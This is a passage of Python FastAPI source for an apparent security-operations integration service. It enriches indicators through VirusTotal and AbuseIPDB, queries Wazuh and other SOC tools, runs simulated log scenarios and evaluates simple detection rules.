rule.get("firedtimes"), "event_id": data.get("event_id") or source.get("id") or hit.get("_id"), "agent_name": agent.get("name"), "full_log": source.get("full_log"), } if include_raw: item["raw"] = source return item @app.post( "/ioc/enrich", response_model=ApiResponse, summary="IOC enrich", description="Fetch enrichment data for IOC from selected providers without final verdict scoring.", ) async def ioc_enrich(payload: IocEnrichRequest) -> ApiResponse: providers = [p.lower().strip() for p in payload.providers] result: dict[str, object] = { "ioc_type": payload.ioc_type, "ioc_value": payload.ioc_value, "providers_requested": providers, "providers": {}, } if "virustotal" in providers: try: vt = await virustotal_adapter.enrich_ioc(payload.ioc_type, payload.ioc_value) result["providers"] = {**(result.get("providers") or {}), "virustotal": vt} except Exception as exc: repo.add_ioc_trace( action="enrich", ioc_type=payload.ioc_type, ioc_value=payload.ioc_value, providers=providers, request_payload=payload.model_dump(mode="json"), response_payload={}, error=str(exc), ) raise HTTPException(status_code=502, detail=f"VirusTotal call failed: {exc}") from exc if "abuseipdb" in providers: if payload.ioc_type != "ip": result["providers"] = { **(result.get("providers") or {}), "abuseipdb": {"skipped": "AbuseIPDB currently supports ioc_type='ip' only"}, } else: try: abuse = await abuseipdb_adapter.check_ip(payload.ioc_value) result["providers"] = {**(result.get("providers") or {}), "abuseipdb": abuse} except Exception as exc: repo.add_ioc_trace( action="enrich", ioc_type=payload.ioc_type, ioc_value=payload.ioc_value, providers=providers, request_payload=payload.model_dump(mode="json"), response_payload={}, error=str(exc), ) raise HTTPException(status_code=502, detail=f"AbuseIPDB call failed: {exc}") from exc repo.add_ioc_trace( action="enrich", ioc_type=payload.ioc_type, ioc_value=payload.ioc_value, providers=providers, request_payload=payload.model_dump(mode="json"), 
response_payload=result, ) return ApiResponse(data={"ioc": result}) @app.post( "/ioc/evaluate", response_model=ApiResponse, summary="IOC evaluate", description="Evaluate IOC against selected intelligence providers and return matched/severity/confidence.", ) async def ioc_evaluate(payload: IocEvaluateRequest) -> ApiResponse: providers = [p.lower().strip() for p in payload.providers] supported = {"virustotal", "abuseipdb"} requested = [p for p in providers if p in supported] if not requested: raise HTTPException(status_code=400, detail="No supported provider requested. Use ['virustotal'] or ['abuseipdb'].") per_provider: dict[str, dict[str, object]] = {} errors: dict[str, str] = {} if "virustotal" in requested: try: vt = await virustotal_adapter.enrich_ioc(payload.ioc_type, payload.ioc_value) vt_result, _, _, _ = _build_vt_ioc_result( vt=vt, ioc_type=payload.ioc_type, ioc_value=payload.ioc_value, malicious_threshold=payload.malicious_threshold, suspicious_threshold=payload.suspicious_threshold, ) per_provider["virustotal"] = vt_result except Exception as exc: errors["virustotal"] = str(exc) if "abuseipdb" in requested: if payload.ioc_type != "ip": errors["abuseipdb"] = "AbuseIPDB supports ioc_type='ip' only" else: try: abuse = await abuseipdb_adapter.check_ip(payload.ioc_value) abuse_result, _, _, _ = _build_abuseipdb_ioc_result( abuse=abuse, ioc_value=payload.ioc_value, confidence_threshold=50, ) per_provider["abuseipdb"] = abuse_result except Exception as exc: errors["abuseipdb"] = str(exc) if not per_provider: repo.add_ioc_trace( action="evaluate", ioc_type=payload.ioc_type, ioc_value=payload.ioc_value, providers=requested, request_payload=payload.model_dump(mode="json"), response_payload={}, error=str(errors), ) raise HTTPException(status_code=502, detail=f"Provider evaluation failed: {errors}") # aggregate decision (max confidence/severity, matched if any provider matched) order = {"low": 1, "medium": 2, "high": 3, "critical": 4} matched = 
any(bool(r.get("matched")) for r in per_provider.values()) confidence = max(float(r.get("confidence", 0.0) or 0.0) for r in per_provider.values()) severity = max((str(r.get("severity", "low")) for r in per_provider.values()), key=lambda x: order.get(x, 1)) reason_parts = [f"{name}:{res.get('reason','')}" for name, res in per_provider.items()] if errors: reason_parts.append(f"errors={errors}") ioc_result = { "ioc_type": payload.ioc_type, "ioc_value": payload.ioc_value, "matched": matched, "severity": severity, "confidence": round(confidence, 4), "reason": " | ".join(reason_parts), "providers": per_provider, } repo.add_ioc_trace( action="evaluate", ioc_type=payload.ioc_type, ioc_value=payload.ioc_value, providers=providers, request_payload=payload.model_dump(mode="json"), response_payload=ioc_result, matched=matched, severity=severity, confidence=float(ioc_result["confidence"]), ) return ApiResponse(data={"ioc": ioc_result}) @app.post( "/ioc/upload-file", response_model=ApiResponse, summary="Upload file to VirusTotal", description="Upload a file sample to VirusTotal and return upload/analysis identifiers.", ) async def ioc_upload_file(file: UploadFile = File(...)) -> ApiResponse: content = await file.read() if not content: raise HTTPException(status_code=400, detail="Uploaded file is empty") try: vt_upload = await virustotal_adapter.upload_file(file.filename or "upload.bin", content) except Exception as exc: repo.add_ioc_trace( action="upload_file", ioc_type="hash", ioc_value=file.filename or "", providers=["virustotal"], request_payload={"filename": file.filename, "size": len(content)}, response_payload={}, error=str(exc), ) raise HTTPException(status_code=502, detail=f"VirusTotal upload failed: {exc}") from exc repo.add_ioc_trace( action="upload_file", ioc_type="hash", ioc_value=file.filename or "", providers=["virustotal"], request_payload={"filename": file.filename, "size": len(content)}, response_payload=vt_upload if isinstance(vt_upload, dict) else {"raw": 
str(vt_upload)}, ) return ApiResponse(data={"virustotal": vt_upload}) @app.get( "/ioc/analysis/{analysis_id}", response_model=ApiResponse, summary="Get VirusTotal analysis", description="Fetch analysis status/details from VirusTotal by analysis ID.", ) async def ioc_get_analysis(analysis_id: str) -> ApiResponse: try: vt_analysis = await virustotal_adapter.get_analysis(analysis_id) except Exception as exc: repo.add_ioc_trace( action="analysis", ioc_type="hash", ioc_value=analysis_id, providers=["virustotal"], request_payload={"analysis_id": analysis_id}, response_payload={}, error=str(exc), ) raise HTTPException(status_code=502, detail=f"VirusTotal analysis fetch failed: {exc}") from exc repo.add_ioc_trace( action="analysis", ioc_type="hash", ioc_value=analysis_id, providers=["virustotal"], request_payload={"analysis_id": analysis_id}, response_payload=vt_analysis if isinstance(vt_analysis, dict) else {"raw": str(vt_analysis)}, ) return ApiResponse(data={"virustotal": vt_analysis}) @app.post( "/ioc/evaluate-file", response_model=ApiResponse, summary="Evaluate uploaded file IOC", description="Upload a file, poll analysis completion, fetch final file report, and return IOC verdict.", ) async def ioc_evaluate_file( file: UploadFile = File(...), malicious_threshold: int = 1, suspicious_threshold: int = 3, poll_timeout_seconds: int = 30, poll_interval_seconds: int = 2, ) -> ApiResponse: content = await file.read() if not content: raise HTTPException(status_code=400, detail="Uploaded file is empty") try: vt_upload = await virustotal_adapter.upload_file(file.filename or "upload.bin", content) except Exception as exc: repo.add_ioc_trace( action="evaluate_file", ioc_type="hash", ioc_value=file.filename or "", providers=["virustotal"], request_payload={"filename": file.filename, "size": len(content)}, response_payload={}, error=str(exc), ) raise HTTPException(status_code=502, detail=f"VirusTotal upload failed: {exc}") from exc analysis_id = ( (((vt_upload.get("data") or 
{}).get("id")) if isinstance(vt_upload, dict) else None) or "" ) if not analysis_id: raise HTTPException(status_code=502, detail="VirusTotal upload response missing analysis ID") timeout = max(1, poll_timeout_seconds) interval = max(1, poll_interval_seconds) elapsed = 0 analysis: dict[str, object] = {} while elapsed <= timeout: analysis = await virustotal_adapter.get_analysis(analysis_id) status = ( (((analysis.get("data") or {}).get("attributes") or {}).get("status")) if isinstance(analysis, dict) else None ) if status == "completed": break await asyncio.sleep(interval) elapsed += interval sha256 = ( (((analysis.get("meta") or {}).get("file_info") or {}).get("sha256")) if isinstance(analysis, dict) else None ) if not sha256: raise HTTPException(status_code=502, detail="VirusTotal analysis did not return file hash yet") try: vt_file = await virustotal_adapter.enrich_ioc("hash", str(sha256)) except Exception as exc: repo.add_ioc_trace( action="evaluate_file", ioc_type="hash", ioc_value=str(sha256), providers=["virustotal"], request_payload={"filename": file.filename, "analysis_id": analysis_id}, response_payload={"upload": vt_upload, "analysis": analysis}, error=str(exc), ) raise HTTPException(status_code=502, detail=f"VirusTotal report fetch failed: {exc}") from exc ioc_result, matched, severity, confidence = _build_vt_ioc_result( vt=vt_file, ioc_type="hash", ioc_value=str(sha256), malicious_threshold=malicious_threshold, suspicious_threshold=suspicious_threshold, ) ioc_result["analysis_id"] = analysis_id ioc_result["filename"] = file.filename repo.add_ioc_trace( action="evaluate_file", ioc_type="hash", ioc_value=str(sha256), providers=["virustotal"], request_payload={"filename": file.filename, "analysis_id": analysis_id}, response_payload={ "upload": vt_upload, "analysis": analysis, "ioc": ioc_result, }, matched=matched, severity=severity, confidence=confidence, ) return ApiResponse(data={"ioc": ioc_result, "analysis": analysis, "upload": vt_upload}) @app.get( 
"/ioc/history", response_model=ApiResponse, summary="IOC trace history", description="List recent IOC enrichment/evaluation trace records stored in database.", ) async def ioc_history(limit: int = 50, offset: int = 0) -> ApiResponse: return ApiResponse(data={"items": repo.list_ioc_trace(limit=limit, offset=offset)}) @app.get( "/geoip/{ip}", response_model=ApiResponse, summary="GeoIP lookup", description="Lookup geolocation for a public IP address using configured GeoIP provider.", ) async def geoip_lookup(ip: str) -> ApiResponse: result = await geoip_adapter.lookup(ip) return ApiResponse(data={"geoip": result}) @app.get( "/sync/wazuh-version", response_model=ApiResponse, summary="Wazuh version", description="Get Wazuh API/manager version information through adapter.", ) async def sync_wazuh_version() -> ApiResponse: try: wazuh_result = await wazuh_adapter.get_version() except Exception as exc: raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc return ApiResponse(data={"wazuh": wazuh_result}) @app.get( "/wazuh/auth-test", response_model=ApiResponse, summary="Wazuh auth test", description="Validate Wazuh API authentication using configured credentials.", ) async def wazuh_auth_test() -> ApiResponse: try: result = await wazuh_adapter.auth_test() except Exception as exc: raise HTTPException(status_code=502, detail=f"Wazuh auth failed: {exc}") from exc return ApiResponse(data={"wazuh": result}) @app.get( "/wazuh/manager-info", response_model=ApiResponse, summary="Wazuh manager info", description="Return manager information from Wazuh API.", ) async def wazuh_manager_info() -> ApiResponse: try: result = await wazuh_adapter.get_manager_info() except Exception as exc: raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc return ApiResponse(data={"wazuh": result}) @app.get( "/wazuh/agents", response_model=ApiResponse, summary="List Wazuh agents", description="List registered Wazuh agents with pagination and optional 
field selection.", ) async def wazuh_agents( limit: int = 50, offset: int = 0, select: str | None = None, ) -> ApiResponse: try: result = await wazuh_adapter.list_agents(limit=limit, offset=offset, select=select) except Exception as exc: raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc return ApiResponse(data={"wazuh": result}) @app.get( "/wazuh/alerts", response_model=ApiResponse, summary="List Wazuh alerts", description="List alert-like entries from manager logs API for current Wazuh build.", ) async def wazuh_alerts( limit: int = 50, offset: int = 0, q: str | None = None, sort: str | None = None, ) -> ApiResponse: try: # In this Wazuh build, API alerts are exposed via manager logs. result = await wazuh_adapter.list_manager_logs( limit=limit, offset=offset, q=q, sort=sort ) except Exception as exc: raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc return ApiResponse(data={"wazuh": result}) @app.get( "/wazuh/manager-logs", response_model=ApiResponse, summary="List Wazuh manager logs", description="Query manager logs endpoint with pagination and optional q/sort filters.", ) async def wazuh_manager_logs( limit: int = 50, offset: int = 0, q: str | None = None, sort: str | None = None, ) -> ApiResponse: try: result = await wazuh_adapter.list_manager_logs( limit=limit, offset=offset, q=q, sort=sort ) except Exception as exc: raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc return ApiResponse(data={"wazuh": result}) @app.post( "/wazuh/sync-to-mvp", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="Sync Wazuh to MVP", description="Fetch Wazuh alerts from indexer and pass them through MVP ingest/evaluation logic.", ) async def wazuh_sync_to_mvp( limit: int = 50, minutes: int = 120, q: str = "soc_mvp_test=true OR event_type:*", ) -> ApiResponse: try: result = await mvp_service.sync_wazuh_alerts(query=q, limit=limit, minutes=minutes) except 
Exception as exc: raise HTTPException(status_code=502, detail=f"Wazuh sync failed: {exc}") from exc return ApiResponse(data={"sync": result}) @app.get( "/wazuh/auto-sync/status", response_model=ApiResponse, summary="Wazuh auto-sync status", description="Show auto-sync enablement, settings, task runtime state, and last sync result.", ) async def wazuh_auto_sync_status() -> ApiResponse: state = getattr(app.state, "wazuh_auto_sync_state", {}) task = getattr(app.state, "wazuh_auto_sync_task", None) return ApiResponse( data={ "enabled": settings.wazuh_auto_sync_enabled, "task_running": bool(task and not task.done()), "settings": { "interval_seconds": settings.wazuh_auto_sync_interval_seconds, "limit": settings.wazuh_auto_sync_limit, "minutes": settings.wazuh_auto_sync_minutes, "query": settings.wazuh_auto_sync_query, }, "state": state, } ) @app.get( "/monitor/db/tables", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="List database tables", description="List soc-integrator PostgreSQL tables with row count and relation size.", ) async def monitor_db_tables() -> ApiResponse: rows: list[dict[str, object]] = [] with get_conn() as conn, conn.cursor() as cur: cur.execute( """ SELECT t.schemaname, t.tablename, COALESCE(s.n_live_tup, 0)::BIGINT AS estimated_rows, COALESCE(pg_total_relation_size(format('%I.%I', t.schemaname, t.tablename)), 0)::BIGINT AS size_bytes, COALESCE(pg_size_pretty(pg_total_relation_size(format('%I.%I', t.schemaname, t.tablename))), '0 bytes') AS size_pretty FROM pg_tables t LEFT JOIN pg_stat_user_tables s ON s.schemaname = t.schemaname AND s.relname = t.tablename WHERE t.schemaname = 'public' ORDER BY t.tablename """ ) tables = cur.fetchall() for item in tables: schema = str(item.get("schemaname") or "public") table = str(item.get("tablename") or "") if not table: continue cur.execute( sql.SQL("SELECT COUNT(*) AS cnt FROM {}.{}").format( sql.Identifier(schema), sql.Identifier(table), ) ) count_row = cur.fetchone() 
or {} row_count = int(count_row.get("cnt", 0) or 0) rows.append( { "schema": schema, "table": table, "row_count": row_count, "estimated_rows": int(item.get("estimated_rows", 0) or 0), "size_bytes": int(item.get("size_bytes", 0) or 0), "size_pretty": str(item.get("size_pretty") or "0 bytes"), } ) return ApiResponse( data={ "database": settings.soc_integrator_db_name, "generated_at": datetime.now(timezone.utc).isoformat(), "tables": rows, } ) @app.get( "/monitor/db/tables/{table_name}/rows", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="List rows from selected table", description="Return rows from a selected public table with pagination.", ) async def monitor_db_table_rows( table_name: str, limit: int = 50, offset: int = 0, ) -> ApiResponse: table = str(table_name or "").strip() if not table: raise HTTPException(status_code=400, detail="table_name is required") page_limit = max(1, min(int(limit), 500)) page_offset = max(0, int(offset)) with get_conn() as conn, conn.cursor() as cur: cur.execute( """ SELECT 1 FROM pg_tables WHERE schemaname = 'public' AND tablename = %s LIMIT 1 """, (table,), ) if not cur.fetchone(): raise HTTPException(status_code=404, detail=f"table '{table}' not found in schema public") cur.execute( sql.SQL("SELECT COUNT(*) AS cnt FROM {}.{}").format( sql.Identifier("public"), sql.Identifier(table), ) ) total_row = cur.fetchone() or {} total = int(total_row.get("cnt", 0) or 0) cur.execute( sql.SQL("SELECT * FROM {}.{} ORDER BY 1 DESC LIMIT %s OFFSET %s").format( sql.Identifier("public"), sql.Identifier(table), ), (page_limit, page_offset), ) rows = [dict(item) for item in (cur.fetchall() or [])] return ApiResponse( data={ "table": table, "limit": page_limit, "offset": page_offset, "total": total, "rows": rows, } ) @app.get( "/monitor/systems", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="Systems monitor overview", description="Unified monitoring snapshot for Wazuh, 
Shuffle, IRIS, and PagerDuty with pipeline KPIs and recent records.", ) async def monitor_systems( minutes: int = 60, limit: int = 20, include_raw: bool = False, ) -> ApiResponse: window_minutes = max(1, minutes) row_limit = max(1, limit) now = datetime.now(timezone.utc) since = now - timedelta(minutes=window_minutes) now_iso = now.isoformat() dependencies = await mvp_service.dependency_health() monitor_state = getattr(app.state, "systems_monitor_state", {"last_ok_at": {}}) last_ok_at_by_key = monitor_state.setdefault("last_ok_at", {}) # KPI counters from persisted database records in the selected lookback window. alerts_ingested = repo.count_incident_events_since(since=since, source="wazuh") detections_matched = repo.count_c_detection_events_since(since=since) iris_tickets_created = repo.count_incidents_with_iris_since(since=since) pagerduty_escalations_sent = repo.count_escalations_since(since=since, success=True) pagerduty_escalations_failed = repo.count_escalations_since(since=since, success=False) wazuh_recent: list[object] = [] wazuh_recent_error: str | None = None try: wazuh_resp = await wazuh_adapter.list_manager_logs(limit=row_limit, offset=0, q=None, sort=None) wazuh_recent = _extract_first_array(wazuh_resp)[:row_limit] except Exception as exc: wazuh_recent_error = str(exc) shuffle_recent: list[object] = [] shuffle_recent_error: str | None = None try: workflows_resp = await shuffle_adapter.list_workflows() workflows = _extract_first_array(workflows_resp) for item in workflows[:row_limit]: if isinstance(item, dict): shuffle_recent.append( { "id": item.get("id") or item.get("workflow_id"), "name": item.get("name") or item.get("workflow", {}).get("name"), "status": item.get("status"), } ) else: shuffle_recent.append(item) except Exception as exc: shuffle_recent_error = str(exc) iris_recent: list[object] = [] iris_recent_error: str | None = None try: iris_resp = await iris_adapter.list_cases(limit=row_limit, offset=0) iris_recent = 
_extract_first_array(iris_resp)[:row_limit] except Exception as exc: iris_recent_error = str(exc) pagerduty_recent = repo.list_recent_escalations(limit=row_limit) def build_card( label: str, dependency_key: str, recent: list[object], kpis: dict[str, object], extra_error: str | None = None, ) -> dict[str, object]: dep = dependencies.get(dependency_key, {}) dep_status = str(dep.get("status") or "down") status = "ok" if dep_status == "up" else "down" if dep_status == "up": last_ok_at_by_key[label] = now_iso error_parts: list[str] = [] if dep.get("error"): error_parts.append(str(dep.get("error"))) if extra_error: error_parts.append(extra_error) if dep_status == "up" and extra_error: status = "degraded" card: dict[str, object] = { "status": status, "latency_ms": dep.get("latency_ms"), "last_ok_at": last_ok_at_by_key.get(label), "last_error": " | ".join(error_parts) if error_parts else None, "kpis": kpis, "recent": recent, } if include_raw: card["raw"] = dep.get("details") return card cards = { "wazuh": build_card( label="wazuh", dependency_key="wazuh", recent=wazuh_recent, extra_error=wazuh_recent_error, kpis={ "alerts_ingested": alerts_ingested, "recent_rows": len(wazuh_recent), }, ), "shuffle": build_card( label="shuffle", dependency_key="shuffle", recent=shuffle_recent, extra_error=shuffle_recent_error, kpis={ "recent_workflows": len(shuffle_recent), }, ), "iris": build_card( label="iris", dependency_key="iris", recent=iris_recent, extra_error=iris_recent_error, kpis={ "tickets_created": iris_tickets_created, "recent_rows": len(iris_recent), }, ), "pagerduty": build_card( label="pagerduty", dependency_key="pagerduty_stub", recent=pagerduty_recent, kpis={ "escalations_sent": pagerduty_escalations_sent, "escalations_failed": pagerduty_escalations_failed, }, ), } app.state.systems_monitor_state = monitor_state return ApiResponse( data={ "generated_at": now_iso, "window_minutes": window_minutes, "cards": cards, "pipeline": { "alerts_ingested": alerts_ingested, 
"detections_matched": detections_matched, "iris_tickets_created": iris_tickets_created, "pagerduty_escalations_sent": pagerduty_escalations_sent, "pagerduty_escalations_failed": pagerduty_escalations_failed, }, } ) @app.get( "/sim/logs/runs", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="List simulator runs", description="List active and recent simulator script runs started from soc-integrator.", ) async def sim_logs_runs() -> ApiResponse: sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {}) items: list[dict[str, object]] = [] for run_id, run in sim_runs.items(): serialized = _serialize_sim_run(run_id, run) if (not serialized["running"]) and not run.get("stopped_at"): run["stopped_at"] = datetime.now(timezone.utc).isoformat() serialized["stopped_at"] = run["stopped_at"] items.append(serialized) items.sort(key=lambda x: str(x.get("started_at") or ""), reverse=True) return ApiResponse(data={"items": items}) @app.post( "/sim/logs/start", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="Start simulator logs script", description="Start a whitelisted simulator script in background and return run metadata.", ) async def sim_logs_start(payload: SimLogRunRequest) -> ApiResponse: script_name = SIM_SCRIPT_MAP[payload.script] script_path = SIM_SCRIPTS_DIR / script_name if not script_path.exists(): raise HTTPException(status_code=400, detail=f"Simulator script not found in container: {script_name}") cmd = _build_sim_command(payload) env = dict(os.environ) env.setdefault("WAZUH_SYSLOG_HOST", "wazuh.manager") env.setdefault("WAZUH_SYSLOG_PORT", "514") run_id = str(uuid.uuid4()) log_file = SIM_RUN_LOGS_DIR / f"{run_id}.log" log_handle = None try: log_handle = log_file.open("ab") process = subprocess.Popen( cmd, cwd=str(SIM_SCRIPTS_DIR), env=env, stdout=log_handle, stderr=subprocess.STDOUT, start_new_session=True, ) except Exception as exc: if log_handle: try: log_handle.close() 
except Exception: pass raise HTTPException(status_code=502, detail=f"Failed to start simulator: {exc}") from exc finally: if log_handle: log_handle.close() sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {}) sim_runs[run_id] = { "script": payload.script, "target": payload.target, "scenario": payload.scenario, "count": payload.count, "delay_seconds": payload.delay_seconds, "forever": payload.forever, "pid": process.pid, "cmd": " ".join(shlex.quote(part) for part in cmd), "started_at": datetime.now(timezone.utc).isoformat(), "stopped_at": None, "return_code": None, "log_file": str(log_file), "process": process, } app.state.sim_runs = sim_runs return ApiResponse(data={"run": _serialize_sim_run(run_id, sim_runs[run_id])}) @app.post( "/sim/logs/stop/{run_id}", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="Stop simulator run", description="Stop a running simulator script by run_id.", ) async def sim_logs_stop(run_id: str) -> ApiResponse: sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {}) run = sim_runs.get(run_id) if not run: raise HTTPException(status_code=404, detail=f"Run not found: {run_id}") process = run.get("process") if process and process.poll() is None: try: process.terminate() process.wait(timeout=3) except subprocess.TimeoutExpired: process.kill() except Exception as exc: raise HTTPException(status_code=502, detail=f"Failed to stop run: {exc}") from exc run["stopped_at"] = datetime.now(timezone.utc).isoformat() return ApiResponse(data={"run": _serialize_sim_run(run_id, run)}) @app.post( "/sim/logs/stop-running", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="Stop all running simulator runs", description="Stop all currently running simulator scripts (including forever mode).", ) async def sim_logs_stop_running() -> ApiResponse: sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {}) stopped: list[dict[str, 
object]] = [] already_stopped = 0 for run_id, run in sim_runs.items(): process = run.get("process") if process and process.poll() is None: try: process.terminate() process.wait(timeout=3) except subprocess.TimeoutExpired: process.kill() except Exception as exc: raise HTTPException(status_code=502, detail=f"Failed to stop run {run_id}: {exc}") from exc run["stopped_at"] = datetime.now(timezone.utc).isoformat() stopped.append(_serialize_sim_run(run_id, run)) else: already_stopped += 1 return ApiResponse( data={ "stopped_count": len(stopped), "already_stopped_count": already_stopped, "runs": stopped, } ) @app.get( "/sim/logs/output/{run_id}", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="Get simulator run output", description="Return tailed output lines from simulator run log file.", ) async def sim_logs_output(run_id: str, limit: int = 200) -> ApiResponse: sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {}) run = sim_runs.get(run_id) if not run: raise HTTPException(status_code=404, detail=f"Run not found: {run_id}") log_file_path = run.get("log_file") if not log_file_path: raise HTTPException(status_code=404, detail=f"No log file for run: {run_id}") log_file = Path(str(log_file_path)) lines = _tail_log_lines(log_file, limit=limit) process = run.get("process") running = bool(process and process.poll() is None) return ApiResponse( data={ "run_id": run_id, "running": running, "line_count": len(lines), "lines": lines, "text": "\n".join(lines), "log_file": str(log_file), } ) @app.get( "/sim/logs/wazuh-latest/{run_id}", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="Get latest Wazuh logs/rules for simulator run", description="Return latest Wazuh event logs and matched rules correlated to a simulator run.", ) async def sim_logs_wazuh_latest( run_id: str, limit: int = 50, minutes: int = 15, include_raw: bool = False, ) -> ApiResponse: sim_runs: dict[str, dict[str, 
object]] = getattr(app.state, "sim_runs", {}) run = sim_runs.get(run_id) if not run: raise HTTPException(status_code=404, detail=f"Run not found: {run_id}") requested_minutes = max(1, int(minutes)) # Keep query unfiltered and use a wide lookback to emulate Discover "latest records". effective_minutes = max(1440, requested_minutes) query_limit = max(1, min(int(limit), 200)) query_text = "*" try: raw = await wazuh_adapter.search_alerts( query=query_text, limit=query_limit, minutes=effective_minutes, ) except Exception as exc: raise HTTPException(status_code=502, detail=f"Wazuh search failed: {exc}") from exc hits = _extract_wazuh_hits(raw) events = [_extract_wazuh_event_item(hit, include_raw=include_raw) for hit in hits] rules: list[dict[str, object]] = [] for hit in hits: rule_item = _extract_wazuh_rule_item(hit, include_raw=include_raw) if rule_item: rules.append(rule_item) return ApiResponse( data={ "run": _serialize_sim_run(run_id, run), "query": { "effective_minutes": effective_minutes, "text": query_text, "limit": query_limit, }, "events": events, "rules": rules, "totals": { "events": len(events), "rules": len(rules), }, } ) @app.post( "/monitor/log-loss/check", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="Check log loss", description="Check expected telemetry streams for missing logs in a configurable lookback window.", ) async def monitor_log_loss_check( payload: LogLossCheckRequest | None = None, create_ticket: bool = False, ) -> ApiResponse: req = payload or LogLossCheckRequest() result = await _execute_log_loss_check(req=req, create_ticket=create_ticket) return ApiResponse(data=result) @app.post( "/monitor/c-detections/evaluate", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="Evaluate Appendix C detections", description="Evaluate C1-C3 detection rules on recent events, optionally creating incidents/tickets.", ) async def monitor_c_detections_evaluate(payload: 
CDetectionEvaluateRequest) -> ApiResponse: if not settings.c_detection_enabled: raise HTTPException(status_code=400, detail="C detection is disabled by configuration") started_at = datetime.now(timezone.utc).isoformat() app.state.c_detection_state["last_started_at"] = started_at try: raw = await wazuh_adapter.search_alerts( query=payload.query, limit=max(1, payload.limit), minutes=max(1, payload.minutes), ) hits = (raw.get("hits", {}) or {}).get("hits", []) if isinstance(raw, dict) else [] normalized = [mvp_service.normalize_wazuh_hit(hit) for hit in hits] evaluated = await c_detection_service.evaluate(normalized, selectors=payload.selectors) records: list[dict[str, object]] = [] for match in evaluated.get("matches", []): usecase_id = str(match.get("usecase_id") or "") entity = str(match.get("entity") or "unknown") severity = str(match.get("severity") or "medium") evidence = dict(match.get("evidence") or {}) event_ref = { "event_id": ((match.get("event") or {}).get("event_id")), "timestamp": ((match.get("event") or {}).get("timestamp")), "source": ((match.get("event") or {}).get("source")), } in_cooldown = repo.is_c_detection_in_cooldown( usecase_id=usecase_id, entity=entity, cooldown_seconds=int(settings.c_detection_ticket_cooldown_seconds), ) incident_key: str | None = None event_row = repo.add_c_detection_event( usecase_id=usecase_id, entity=entity, severity=severity, evidence=evidence, event_ref=event_ref, incident_key=None, ) if (not payload.dry_run) and settings.c_detection_create_iris_ticket and not in_cooldown: incident_event = _c_match_to_incident_event(match) ingest = await mvp_service.ingest_incident(incident_event) incident_key = str(ingest.get("incident_key") or "") or None repo.update_c_detection_incident(int(event_row["id"]), incident_key) records.append( { "id": event_row["id"], "usecase_id": usecase_id, "entity": entity, "severity": severity, "incident_key": incident_key, "cooldown_active": in_cooldown, "evidence": evidence, } ) result = { "query": 
payload.query, "minutes": max(1, payload.minutes), "selectors": payload.selectors, "dry_run": payload.dry_run, "summary": evaluated.get("summary", {}), "matches": records, "total_hits": len(hits), } app.state.c_detection_state["last_status"] = "ok" app.state.c_detection_state["last_result"] = result app.state.c_detection_state["last_finished_at"] = datetime.now(timezone.utc).isoformat() return ApiResponse(data=result) except Exception as exc: app.state.c_detection_state["last_status"] = "error" app.state.c_detection_state["last_error"] = str(exc) app.state.c_detection_state["last_finished_at"] = datetime.now(timezone.utc).isoformat() raise HTTPException(status_code=502, detail=f"C detection evaluation failed: {exc}") from exc @app.get( "/monitor/c-detections/history", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="C detection history", description="List persisted C1-C3 detection matches, including evidence and linked incident keys.", ) async def monitor_c_detections_history( limit: int = 50, offset: int = 0, usecase_id: str | None = None, ) -> ApiResponse: rows = repo.list_c_detection_events(limit=limit, offset=offset, usecase_id=usecase_id) return ApiResponse(data={"items": rows, "limit": max(1, limit), "offset": max(0, offset), "usecase_id": usecase_id}) @app.get( "/monitor/c-detections/state", response_model=ApiResponse, dependencies=[Depends(require_internal_api_key)], summary="C detection state", description="Return Appendix C detection settings and last evaluation runtime state.", ) async def monitor_c_detections_state() -> ApiResponse: return ApiResponse( data={ "enabled": settings.c_detection_enabled, "settings": { "window_minutes": settings.c_detection_window_minutes, "c1_max_travel_speed_kmph": settings.c1_max_travel_speed_kmph, "c2_offhours_start_utc": settings.c2_offhours_start_utc, "c2_offhours_end_utc": settings.c2_offhours_end_utc, "c3_host_spread_threshold": settings.c3_host_spread_threshold, 
"c3_scan_port_threshold": settings.c3_scan_port_threshold, "create_iris_ticket": settings.c_detection_create_iris_ticket, "ticket_cooldown_seconds": settings.c_detection_ticket_cooldown_seconds, }, "state": getattr(app.state, "c_detection_state", {}), } ) # --------------------------------------------------------------------------- # KPI Timeout helpers and IRIS alert routes # --------------------------------------------------------------------------- SLA_SECONDS: dict[str, int] = {"High": 14400, "Medium": 28800, "Low": 86400} def compute_kpi( created_at: str, severity_name: str, resolved_at: str | None = None, ) -> dict[str, object]: sla = SLA_SECONDS.get(severity_name, 28800) def _parse(ts: str) -> datetime: dt = datetime.fromisoformat(ts.replace("Z", "+00:00")) return dt if dt.tzinfo else dt.replace(tzinfo=timezone.utc) start = _parse(created_at) thresholds = [("S1", "#22c55e", 25), ("S2", "#eab308", 50), ("S3", "#f97316", 75), ("S4", "#ef4444", 100)] if resolved_at: end = _parse(resolved_at) elapsed = max(0, (end - start).total_seconds()) # clamp: close_date can't precede open_date elapsed_pct = min(elapsed / sla * 100, 100) kpi_pct = max(100 - elapsed_pct, 0) segments = [{"label": l, "color": c, "active": elapsed_pct >= t} for l, c, t in thresholds] return { "kpi_pct": round(kpi_pct, 1), "elapsed_pct": round(elapsed_pct, 1), "status": 